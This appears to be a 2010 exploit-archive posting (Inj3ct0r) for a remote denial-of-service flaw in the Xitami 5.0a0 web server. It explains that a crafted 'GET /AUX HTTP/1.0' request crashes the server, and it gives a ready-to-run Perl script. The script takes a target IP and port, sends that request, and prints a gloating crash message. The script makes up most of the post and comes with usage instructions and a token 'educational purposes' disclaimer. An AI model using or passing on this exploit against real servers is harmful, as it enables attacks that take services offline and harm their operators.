Xitami / 5.0a0 Denial Of Service
Posted on 10 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Xitami / 5.0a0 Denial Of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================ Xitami / 5.0a0 Denial Of Service ================================ ########################################################################################### # # Name : Xitami/5.0a0 Denial Of Service # Author: Usman Saeed # Company: Xc0re Security Research Group # Website:http://www.xc0re.net # DATE: 10/05/10 # Tested on Windows 7 ! ########################################################################################### Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] [*] Download Page :http://www.xitami.com [*] Attack type : Remote [*] Patch Status : Unpatched [*] Description : By sending a crafted GET request [GET /AUX HTTP/1.0] to the server , the server crashes ! [*] Exploitation : #!/usr/bin/perl # Xitami/5.0a0 Denial Of Service # Disclaimer: # [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] # Author: Usman Saeed # Company: Xc0re Security Research Group # Website: http://www.xc0re.net # DATE: [10/05/10] $host = $ARGV[0]; $PORT = $ARGV[1]; $packet = "AUX"; $stuff = "GET /".$packet." HTTP/1.0 " . use IO::Socket::INET; if (! defined $ARGV[0]) { print "+========================================================+ "; print "+ Program [Xitami/5.0a0 Denial Of Service] + "; print "+ Author [Usman Saeed] + "; print "+ Company [Xc0re Security Research Group] + "; print "+ DATE: [10/05/10] + "; print "+ Usage :perl sploit.pl webserversip wbsvrport + "; print "+ Disclaimer: [This code is for Educational Purposes , + "; print "+ I would Not be responsible for any misuse of this code]+ "; print "+========================================================+ "; exit; } $sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , PeerPort => $PORT) || die "Cant connect to $host!"; print "+========================================================+ "; print "+ Program [Xitami/5.0a0 Denial Of Service] + "; print "+ Author [Usman Saeed] + "; print "+ Company [Xc0re Security Research Group] + "; print "+ DATE: [10/05/10] + "; print "+ Usage :perl sploit.pl webserversip wbsvrport + "; print "+ Disclaimer: [This code is for Educational Purposes , + "; print "+ I would Not be responsible for any misuse of this code]+ "; print "+========================================================+ "; print " "; print "[*] Initializing "; sleep(2); print "[*] Sendin DOS Packet "; send ($sock , $stuff , 0); print "[*] Crashed :) "; $res = recv($sock,$response,1024,0); print $response; exit; Author : Usman Saeed , Xc0re Security Research Group. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
